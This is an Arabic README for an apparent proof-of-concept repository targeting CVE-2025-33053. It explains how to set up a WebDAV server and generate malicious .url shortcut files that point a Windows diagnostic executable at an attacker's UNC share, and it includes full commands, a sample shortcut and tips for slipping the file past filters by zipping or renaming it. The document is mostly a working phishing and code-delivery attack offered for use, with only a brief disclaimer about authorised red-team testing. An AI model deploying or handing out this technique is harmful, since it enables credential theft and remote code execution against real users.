
CVE-2025-33053 إثبات المفهوم (PoC)
يوفر هذا المستودع نصوصًا برمجية لنشر خادم WebDAV تلقائيًا على Ubuntu باستخدام Apache2، وإنشاء ملفات اختصارات .url خبيثة لاستخدامها في التصيد الاحتيالي، اختبار الفريق الأحمر، أو محاكاة الحركة الجانبية.
setup_webdav.sh – نص برمجي Bash لإعداد Apache2 + WebDAV.setup_webdav.py – نسخة Python مما سبق.gen_url.py – نص برمجي Python لإنشاء ملفات اختصارات .url بمسارات UNC/WebDAV.README.md – التوثيق.sudo)sudo bash setup_webdav.sh
أو باستخدام Python:
sudo python3 setup_webdav.py
بشكل افتراضي، سيقوم النص البرمجي بما يلي:
/var/www/webdav.DAV وDAV_FS.DavLockDB (لمنع أخطاء قفل Apache DAV).📎 مسار WebDAV:
http://<your-ip>/webdav/
.url خبيثpython3 gen_url.py --ip 192.168.1.100 --out doc.url
python3 gen_url.py \
--ip 《YOUR IP ADDRESS》\
--share 《YOUR SHARE NAME》(Default: webdav) \
--out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
--exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
--icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
--index 13 \
--modified 20F06BA06D07BD014D
سينشئ هذا ملف .url مثل:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
📌 قد يؤدي النقر على هذا الملف (في بعض الإعدادات) إلى اتصال النظام الهدف تلقائيًا بخادم WebDAV الخاص بك (مصادقة أو تسليم DLL).
عطّل جدار الحماية (أو افتح المنفذ 80) إذا كنت تختبر على شبكة محلية:
sudo ufw allow 80
قد لا يتم تنفيذ ملفات .url كما هو متوقع اعتمادًا على:
قد تحتاج إلى ضغط ملف .url أو إعادة تسميته إلى .txt لتجاوز عوامل التصفية.
هذا المستودع مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط.
لا تستخدم هذه النصوص البرمجية ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها.
للأسئلة أو طلبات اختبار الفريق الأحمر الأخلاقي، تواصل عبر GitHub Issues.